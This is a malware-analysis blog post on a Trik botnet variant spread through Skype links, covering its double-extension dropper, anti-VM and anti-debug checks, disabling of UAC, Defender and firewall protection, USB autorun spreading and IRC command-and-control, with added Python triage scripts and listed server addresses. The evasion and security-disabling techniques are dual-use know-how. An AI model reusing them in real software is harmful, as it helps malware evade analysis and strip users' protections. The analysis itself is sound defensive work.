An analysis of a variant of Trik botnet

Today a friend of mine was infected by malware after clicking on a link sent via Skype. The malware is a variant of the Trik 2.5 botnet, which was discovered last month [1], but at the time of writing only a few AV vendors detect this sample.

Screen Shot 2016-06-30 at 19.54.06

The malicious link looks like this:

http://www.goo.gl/[id]?profile_photo=tcthanh.ftu

This link redirects the user to another page, which automatically downloads a malicious ZIP file.

Inside the archive is a .NET executable with a double extension, .jpeg.com:

Screen Shot 2016-06-30 at 20.20.24

By default, Windows Explorer hides file name extensions for known file types, and .com is a known type. A file named <name>.jpeg.com is therefore displayed as <name>.jpeg, so the victim takes it for an image while Windows still treats it as a directly executable program.
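The double-extension trick is easy to check for automatically when triaging a downloaded archive. The following script is an added example (not code from the original post): it lists the members of a ZIP, computes the name Explorer would display with "Hide extensions for known file types" enabled, and flags members whose real extension is executable while the displayed one looks like a document or image. The extension lists and the sample archive are constructed for the example; the placeholder member is not the real dropper.

```python
"""Flag archive members whose Explorer-visible name hides an executable extension."""
import io
import zipfile

# Extensions Windows runs directly (assumed list for this example, not exhaustive).
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd",
                   ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".lnk"}
# Extensions a victim would read as a harmless document or picture (assumed list).
DECOY_EXTS = {".jpeg", ".jpg", ".png", ".gif", ".bmp", ".pdf", ".doc", ".docx", ".txt"}


def explorer_display_name(name: str) -> str:
    """Name as Explorer shows it with 'Hide extensions for known file types' on:
    only the final extension is removed, so 'x.jpeg.com' is shown as 'x.jpeg'."""
    stem, dot, _ext = name.rpartition(".")
    return stem if dot and stem else name


def classify_name(member_name: str) -> dict:
    """Compare the real (last) extension with the one the victim sees."""
    base = member_name.rsplit("/", 1)[-1]          # ZIP uses '/' as separator
    lower = base.lower()
    true_ext = "." + lower.rsplit(".", 1)[-1] if "." in lower else ""
    displayed = explorer_display_name(base)
    shown_ext = "." + displayed.lower().rsplit(".", 1)[-1] if "." in displayed else ""
    executable = true_ext in EXECUTABLE_EXTS
    return {
        "name": base,
        "displayed_as": displayed,
        "true_ext": true_ext,
        "executable": executable,
        # Executable hiding behind a decoy extension: the pattern used by this sample.
        "suspicious": executable and shown_ext in DECOY_EXTS,
    }


def scan_zip(data: bytes) -> list:
    """Classify every file member of an in-memory ZIP archive."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [classify_name(info.filename) for info in zf.infolist() if not info.is_dir()]


def build_sample_zip() -> bytes:
    """Constructed archive mimicking the delivery described above (placeholder contents)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("profile_photo.jpeg.com", b"MZ placeholder, not a real binary")
        zf.writestr("readme.txt", b"harmless text")
    return buf.getvalue()


if __name__ == "__main__":
    for entry in scan_zip(build_sample_zip()):
        print(entry)
```

Run it against a real download with `scan_zip(open(path, "rb").read())`; anything with `suspicious` set deserves a look before the user does.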

Technical details

The sample is simply a container: the actual malicious binary is stored encrypted inside it. After decryption, that binary is loaded in memory and started through the Invoke method. Although the sample is obfuscated, the decryption routine is easy to find:

Screen Shot 2016-06-30 at 20.51.24

The malware decrypts its parameters, then sets its zone identifier to 2 (the Trusted Sites zone) so that the restrictions Windows applies to files downloaded from the Internet no longer apply.

Screen Shot 2016-06-30 at 20.56.07

It carefully checks for the presence of forensic tools and sandboxes:

Screen Shot 2016-06-30 at 21.01.29

Then the malware modifies the registry to disable UAC:

Screen Shot 2016-06-30 at 21.05.31

Finally, another payload is decrypted and executed:

Screen Shot 2016-06-30 at 21.06.40

This payload is a PE file. Its printable strings tell part of its story:

The C&C server of the sample in [1] is located in China, but this one is different!

Bot behaviours

Once the malware is running, it adds itself to the registry so that it runs at startup.

Anti-VM[2]

The bot reads the product ID of the first storage device and checks whether it contains one of four blacklisted strings.

Screen Shot 2016-06-30 at 21.41.11

In the image above, the method first opens a handle to the first physical storage device with CreateFileA on \\.\PhysicalDrive0. It then sends the control code 0x2D1400 (IOCTL_STORAGE_QUERY_PROPERTY) to the device via DeviceIoControl to retrieve the device descriptor. If the product ID in the result contains one of the blacklisted strings, the malware exits. This is the classic hypervisor check on the virtual disk's model string, so renaming the virtual disk in the hypervisor configuration, or patching the comparison, is enough to get past it.
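To see exactly what the bot is matching against, it helps to reproduce the check outside the sample. The script below is an added example (not code from the original post): it parses the STORAGE_DEVICE_DESCRIPTOR structure that IOCTL_STORAGE_QUERY_PROPERTY returns, extracts the vendor, product and serial strings by their offsets, and applies a product-ID blacklist. The four strings the sample really uses are only visible in the screenshot, so the blacklist here is an assumed stand-in covering common hypervisors; the descriptor buffers are constructed so the logic can be tested offline, and `query_physical_drive0` performs the live CreateFile + DeviceIoControl call on Windows.

```python
"""Reproduce the storage-device fingerprint check and inspect the buffer it operates on."""
import struct
import sys

IOCTL_STORAGE_QUERY_PROPERTY = 0x2D1400   # the control code seen in the sample

# Fixed header of STORAGE_DEVICE_DESCRIPTOR (winioctl.h), little-endian:
#   DWORD Version, Size; BYTE DeviceType, DeviceTypeModifier, RemovableMedia, CommandQueueing;
#   DWORD VendorIdOffset, ProductIdOffset, ProductRevisionOffset, SerialNumberOffset,
#         BusType, RawPropertiesLength.  String offsets are relative to the structure start.
_HDR = struct.Struct("<IIBBBBIIIIII")

# Assumed stand-ins for the sample's four blacklisted strings (the real ones are in the screenshot).
BLACKLIST = (b"VBOX", b"VMWARE", b"QEMU", b"VIRTUAL")


def _cstr(buf: bytes, off: int) -> bytes:
    """NUL-terminated string at offset `off`; offset 0 means 'not present'."""
    if off == 0 or off >= len(buf):
        return b""
    end = buf.find(b"\0", off)
    return buf[off:end if end != -1 else len(buf)]


def parse_descriptor(buf: bytes) -> dict:
    (_ver, _size, _dtype, _mod, removable, _queue,
     vendor_off, product_off, rev_off, serial_off, bus_type, _raw_len) = _HDR.unpack_from(buf)
    return {
        "vendor": _cstr(buf, vendor_off).strip(),
        "product": _cstr(buf, product_off).strip(),
        "revision": _cstr(buf, rev_off).strip(),
        "serial": _cstr(buf, serial_off).strip(),
        "removable": bool(removable),
        "bus_type": bus_type,
    }


def looks_virtual(buf: bytes) -> bool:
    """The sample's decision: halt if the product ID contains a blacklisted substring."""
    product = parse_descriptor(buf)["product"].upper()
    return any(marker in product for marker in BLACKLIST)


def build_descriptor(vendor: bytes, product: bytes, revision: bytes = b"1.0") -> bytes:
    """Construct a descriptor laid out the way the storage stack returns it (for offline tests)."""
    strings, offsets = b"", []
    for s in (vendor, product, revision):
        offsets.append(_HDR.size + len(strings))
        strings += s + b"\0"
    hdr = _HDR.pack(1, _HDR.size + len(strings), 0, 0, 0, 0,
                    offsets[0], offsets[1], offsets[2], 0, 1, 0)   # BusType 1 = SCSI
    return hdr + strings


def query_physical_drive0() -> bytes:
    """Live equivalent of the sample's check (Windows only). Opening with desired access 0 normally
    works without administrative rights because the IOCTL requires no read/write access."""
    import ctypes
    from ctypes import wintypes
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.CreateFileW.restype = wintypes.HANDLE
    k32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD, wintypes.LPVOID,
                                wintypes.DWORD, wintypes.DWORD, wintypes.HANDLE]
    k32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.LPVOID, wintypes.DWORD,
                                    wintypes.LPVOID, wintypes.DWORD, wintypes.LPDWORD, wintypes.LPVOID]
    k32.CloseHandle.argtypes = [wintypes.HANDLE]
    FILE_SHARE_READ_WRITE, OPEN_EXISTING = 0x3, 3
    INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value
    h = k32.CreateFileW(r"\\.\PhysicalDrive0", 0, FILE_SHARE_READ_WRITE, None, OPEN_EXISTING, 0, None)
    if h in (None, INVALID_HANDLE_VALUE):
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        # STORAGE_PROPERTY_QUERY: PropertyId = StorageDeviceProperty (0), QueryType = PropertyStandardQuery (0)
        query = struct.pack("<II", 0, 0) + bytes(4)
        out = ctypes.create_string_buffer(1024)
        returned = wintypes.DWORD(0)
        if not k32.DeviceIoControl(h, IOCTL_STORAGE_QUERY_PROPERTY, query, len(query),
                                   out, len(out), ctypes.byref(returned), None):
            raise ctypes.WinError(ctypes.get_last_error())
        return out.raw[:returned.value]
    finally:
        k32.CloseHandle(h)


if __name__ == "__main__":
    if sys.platform == "win32":
        live = query_physical_drive0()
        print(parse_descriptor(live), "virtual" if looks_virtual(live) else "physical")
    else:
        demo = build_descriptor(b"ATA", b"VBOX HARDDISK")       # VirtualBox's default model string
        print(parse_descriptor(demo), looks_virtual(demo))
```

On an analysis VM, run the live query first: if the product string trips the blacklist, either change the disk model in the hypervisor settings or patch the comparison as was done for the dynamic analysis below.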

Anti-Debug, Anti-Forensics, Anti-Wine

The bot calls IsDebuggerPresent to check whether it is being debugged. It also checks for running debuggers and process-explorer tools by calling FindWindowA with the following window class names:

Screen Shot 2016-06-30 at 21.57.19

The following process names are also checked:

Screen Shot 2016-06-30 at 22.00.02

The sample can also detect whether it is running under Wine:

Screen Shot 2016-06-30 at 22.00.54

Bypass Windows Security Mechanisms

The malware adds itself to the authorized application list of the Windows Firewall by modifying the registry:

Screen Shot 2016-06-30 at 22.05.10

It also disables Windows Defender:

Screen Shot 2016-06-30 at 22.10.57
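The Run-key persistence, the UAC change, the firewall exception and the Defender setting described above all leave traces in a handful of registry locations. The script below is an added example (not code from the original post) that turns them into a triage check: `evaluate` runs over a snapshot of those keys, and `snapshot_live` collects such a snapshot with `winreg` on a Windows host. The key paths are the standard locations of these settings, assumed here because the exact keys are only visible in the screenshots; the value names and paths in the sample snapshot are constructed placeholders.

```python
"""Registry triage for the four changes described: Run-key persistence, EnableLUA=0,
a firewall AuthorizedApplications entry, and DisableAntiSpyware=1."""

# Standard locations (assumed; the screenshots above are not reproduced here).
RUN_KEYS = (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
            r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
POLICY_SYSTEM = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
DEFENDER_POLICY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
FW_LIST = (r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy"
           r"\StandardProfile\AuthorizedApplications\List")
ALL_KEYS = (POLICY_SYSTEM, DEFENDER_POLICY, FW_LIST) + RUN_KEYS

# Directories a user-level dropper can write to; binaries there are the interesting ones.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")


def from_user_writable(path) -> bool:
    p = str(path).lower().strip('"')
    return any(marker in p for marker in USER_WRITABLE)


def evaluate(snapshot: dict) -> list:
    """snapshot: {key_path: {value_name: data}}. Returns (kind, key, detail) findings."""
    findings = []
    if snapshot.get(POLICY_SYSTEM, {}).get("EnableLUA") == 0:
        findings.append(("uac_disabled", POLICY_SYSTEM, "EnableLUA=0"))
    if snapshot.get(DEFENDER_POLICY, {}).get("DisableAntiSpyware") == 1:
        findings.append(("defender_disabled", DEFENDER_POLICY, "DisableAntiSpyware=1"))
    for name, data in snapshot.get(FW_LIST, {}).items():
        # Entry format: "<path>:*:Enabled:<display name>"; the value name is the path itself.
        enabled = str(data).split(":*:")[-1].startswith("Enabled")
        if enabled and from_user_writable(name):
            findings.append(("firewall_exception", FW_LIST, name))
    for key in RUN_KEYS:
        for name, data in snapshot.get(key, {}).items():
            if from_user_writable(data):
                findings.append(("run_persistence", key, f"{name} -> {data}"))
    return findings


def snapshot_live() -> dict:
    """Read the keys above on the local Windows machine (missing keys are skipped)."""
    import winreg
    roots = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    snap = {}
    for full in ALL_KEYS:
        root, _, sub = full.partition("\\")
        try:
            with winreg.OpenKey(roots[root], sub) as k:
                values, i = {}, 0
                while True:
                    try:
                        name, data, _typ = winreg.EnumValue(k, i)
                    except OSError:
                        break
                    values[name] = data
                    i += 1
                snap[full] = values
        except OSError:
            continue
    return snap


# Constructed snapshot of an infected host (placeholder file names, not the sample's).
SAMPLE_SNAPSHOT = {
    POLICY_SYSTEM: {"EnableLUA": 0, "ConsentPromptBehaviorAdmin": 5},
    DEFENDER_POLICY: {"DisableAntiSpyware": 1},
    FW_LIST: {r"C:\Users\victim\AppData\Roaming\svc_placeholder.exe":
              r"C:\Users\victim\AppData\Roaming\svc_placeholder.exe:*:Enabled:Device Manager"},
    RUN_KEYS[0]: {"Device Manager": r"C:\Users\victim\AppData\Roaming\svc_placeholder.exe"},
}

if __name__ == "__main__":
    import sys
    snap = snapshot_live() if sys.platform == "win32" else SAMPLE_SNAPSHOT
    for finding in evaluate(snap):
        print(*finding)
```

The firewall and Run-key checks deliberately key on user-writable paths rather than on a fixed file name, since the copied binary's name is the easiest thing for the author to change between builds.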

Self-copy

Like other worms, Trik can copy itself to other locations.

Screen Shot 2016-06-30 at 22.16.32

In the figure, the bot first checks whether the drive type is DRIVE_REMOVABLE or DRIVE_REMOTE before copying itself to it.

Screen Shot 2016-06-30 at 22.27.20

The malware first creates a batch script, DeviceManager.bat. The script checks whether the bot is running and, if not, starts it.

A JavaScript file is then created to launch the batch script:

Screen Shot 2016-06-30 at 22.35.41

Finally, an autorun configuration file (autorun.inf) is placed on the device so that the scripts run automatically whenever the device is mounted. Note that Windows has not honoured AutoRun for non-optical removable media since the February 2011 update, so on patched systems this chain still depends on the victim opening the script by hand.

Screen Shot 2016-06-30 at 22.37.11
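The three files together form a recognisable pattern on an infected stick: an autorun.inf whose launch keys point at a script, a script that invokes a batch file, and the batch file that restarts the bot. The following scanner is an added example (not code from the original post) that walks the root of a volume, parses the [autorun] section, resolves which of the referenced files are actually present, and follows a JavaScript launcher to the batch file it runs. The contents of the sample volume it builds are constructed placeholders; the real scripts' bodies are only visible in the screenshots.

```python
"""Scan a volume root for the autorun.inf -> JavaScript launcher -> batch script chain."""
import configparser
import os
import re
import tempfile

SCRIPT_EXT = r"(?:jse|js|vbs|vbe|wsf|bat|cmd|exe|com|scr|pif)"
TARGET_RE = re.compile(r"[\w\-.\\:]+\." + SCRIPT_EXT + r"\b", re.I)   # file names in launch values
BATCH_RE = re.compile(r"[\w\-]+\.(?:bat|cmd)\b", re.I)                 # batch files named in a script
SCRIPT_SUFFIXES = (".js", ".jse", ".vbs", ".vbe", ".wsf")


def parse_autorun(text: str) -> dict:
    """Return the [autorun] keys that launch something: open, shellexecute, shell\\...\\command."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    section = next((s for s in cp.sections() if s.lower() == "autorun"), None)
    if section is None:
        return {}
    return {k: v for k, v in cp.items(section)
            if k in ("open", "shellexecute") or k.startswith("shell\\")}


def referenced_targets(actions: dict) -> set:
    """Lower-cased base names of every script/executable mentioned in the launch values."""
    names = set()
    for value in actions.values():
        for m in TARGET_RE.finditer(value):
            names.add(re.split(r"[\\/]", m.group(0))[-1].lower())
    return names


def scan_volume_root(root: str) -> dict:
    files = {n.lower(): os.path.join(root, n) for n in os.listdir(root)
             if os.path.isfile(os.path.join(root, n))}
    result = {"autorun_targets": set(), "chain": [], "verdict": "clean"}
    if "autorun.inf" not in files:
        return result
    with open(files["autorun.inf"], encoding="utf-8", errors="replace") as fh:
        result["autorun_targets"] = referenced_targets(parse_autorun(fh.read()))
    for target in sorted(result["autorun_targets"]):
        if target not in files:
            continue                    # e.g. wscript.exe lives in System32, not on the stick
        if target.endswith(SCRIPT_SUFFIXES):
            with open(files[target], encoding="utf-8", errors="replace") as fh:
                script = fh.read()
            for bat in BATCH_RE.findall(script):
                if bat.lower() in files:
                    result["chain"].append((target, bat.lower()))
    if result["chain"]:
        result["verdict"] = "autorun -> script -> batch chain present"
    elif result["autorun_targets"]:
        result["verdict"] = "autorun.inf references a script or executable"
    return result


def build_sample_volume() -> str:
    """Constructed stand-in for an infected stick (placeholder bodies, not the real scripts)."""
    root = tempfile.mkdtemp(prefix="usb_")
    with open(os.path.join(root, "autorun.inf"), "w") as fh:
        fh.write("[autorun]\r\nopen=wscript.exe DeviceManager.js\r\n"
                 "shellexecute=DeviceManager.js\r\nicon=%SystemRoot%\\system32\\shell32.dll,4\r\n")
    with open(os.path.join(root, "DeviceManager.js"), "w") as fh:
        fh.write('new ActiveXObject("WScript.Shell").Run("DeviceManager.bat", 0, false);\r\n')
    with open(os.path.join(root, "DeviceManager.bat"), "w") as fh:
        fh.write('@echo off\r\ntasklist | find /i "bot_placeholder.exe" >nul '
                 '|| start "" bot_placeholder.exe\r\n')
    return root


if __name__ == "__main__":
    print(scan_volume_root(build_sample_volume()))
```

On a real Windows host call `scan_volume_root("E:\\")` (or whichever letter the stick mounted as); on a Linux analysis box point it at the mount directory.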

File-over

On every DRIVE_FIXED volume, the malware deletes every .exe, .zip and .rar file it finds and replaces it with a copy of itself.

Screen Shot 2016-06-30 at 22.42.41

Malicious File Downloader

The malware also downloads copies of itself from the Internet. The dynamic analysis shows at least two live servers hosting the malicious binaries.

Screen Shot 2016-06-30 at 23.16.35


C&C Communication

This variant of Trik still uses IRC to communicate with its C&C server. However, so far there is no evidence that the bot actually executes tasks issued by the C&C server.

The C&C server of this sample is in Vietnam instead of China.

Screen Shot 2016-06-30 at 23.22.45

Whois result:

The bot connects to the C&C server and registers itself:

Screen Shot 2016-06-30 at 23.26.17
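When reading the sandbox traffic, what matters is the registration (NICK and USER), the channels the bot joins, and any PRIVMSG sent into those channels, since that is where commands would arrive. The parser below is an added example (not code from the original post): it splits IRC messages into prefix, command and parameters as RFC 1459 defines them and summarises a session from both directions. The session it ships with is constructed to mirror the shape of the exchange observed (a registration followed by three channel joins); the nicks, channel names, addresses and command text are placeholders, not values from the real C&C.

```python
"""Summarise an IRC session: bot registration, channels joined, and messages into those channels."""


def parse_irc_line(line: str) -> dict:
    """RFC 1459 message: [':' prefix ' '] command {' ' param} [' :' trailing]."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if sep:
        parts.append(trailing)          # trailing param may itself contain spaces and ':'
    if not parts:
        return {"prefix": prefix, "command": "", "params": []}
    return {"prefix": prefix, "command": parts[0].upper(), "params": parts[1:]}


def summarize_session(session) -> dict:
    """session: iterable of (direction, line); 'C' = bot -> server, 'S' = server -> bot."""
    info = {"nick": None, "user": None, "realname": None,
            "joined": [], "confirmed": [], "commands": []}
    for direction, raw in session:
        msg = parse_irc_line(raw.rstrip("\r\n"))
        cmd, p = msg["command"], msg["params"]
        if direction == "C":
            if cmd == "NICK" and p:
                info["nick"] = p[0]
            elif cmd == "USER" and len(p) >= 4:
                info["user"], info["realname"] = p[0], p[3]
            elif cmd == "JOIN" and p:
                info["joined"].extend(ch for ch in p[0].split(",") if ch)   # JOIN #a,#b [keys]
        else:
            sender = (msg["prefix"] or "").split("!")[0]
            if cmd == "JOIN" and p and sender == info["nick"]:
                info["confirmed"].append(p[0])                # server echo of our own JOIN
            elif cmd == "PRIVMSG" and len(p) == 2 and p[0] in info["confirmed"]:
                info["commands"].append((sender, p[0], p[1]))  # anything said in a bot channel
    return info


# Constructed session; placeholders only, shaped like the observed registration + 3 joins.
SAMPLE_SESSION = [
    ("C", "NICK n-0001"),
    ("C", "USER u-0001 0 * :u-0001"),
    ("S", ":irc.example.test 001 n-0001 :Welcome to the network"),
    ("C", "JOIN #ch-a,#ch-b"),
    ("C", "JOIN #ch-c"),
    ("S", ":n-0001!u-0001@203.0.113.5 JOIN :#ch-a"),
    ("S", ":n-0001!u-0001@203.0.113.5 JOIN :#ch-b"),
    ("S", ":n-0001!u-0001@203.0.113.5 JOIN :#ch-c"),
    ("S", ":op!op@198.51.100.9 PRIVMSG #ch-a :!dl http://example.test/update.bin"),
    ("S", "PING :irc.example.test"),
    ("C", "PONG :irc.example.test"),
]

if __name__ == "__main__":
    for k, v in summarize_session(SAMPLE_SESSION).items():
        print(f"{k}: {v}")
```

Feeding a real dump through this (for example the output of `tshark -Y irc -T fields -e irc.request -e irc.response`) gives the channel list directly and isolates the messages that would have to be examined to decide whether the bot acts on commands, which the dynamic analysis below could not confirm.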

Dynamic Analysis

After patching the original sample to remove the anti-VM and anti-Wireshark checks, the bot ran normally in the sandbox.

Traffic dumps from the sandbox show that the bot connected to the C&C server and joined three channels:

Three binaries were downloaded from the Internet. All of them are the same .NET dropper as the original sample.

Screen Shot 2016-06-30 at 23.31.45

These binaries are hosted on two servers:

  • 209.235.144.9
  • 209.126.122.111

Conclusion

  • This variant of the Trik botnet ships with more evasion mechanisms against AV and reverse engineering.
  • The botnet targets Vietnamese users: the Skype messages are in Vietnamese and the C&C server is located in Vietnam.
  • I wonder whether the author of this variant is Vietnamese?
  • Thanks to @k9 for the non-technical advice.

References

[1] http://www.exposedbotnets.com/2016/05/2201818780aspergillus-mod-by-snk-hosted.html

[2] https://www.johannesbader.ch/2016/02/phorpiex/

One thought on “An analysis of a variant of Trik botnet”

  1. Cool! I’m looking for articles like this!

    I think you could continue to analyze the Vietnamese Skype message (is it natural or just using Google Translate) and TRIK 2.5 deliver’s threat to find out if this variant was coded by Vietnamese author(s).
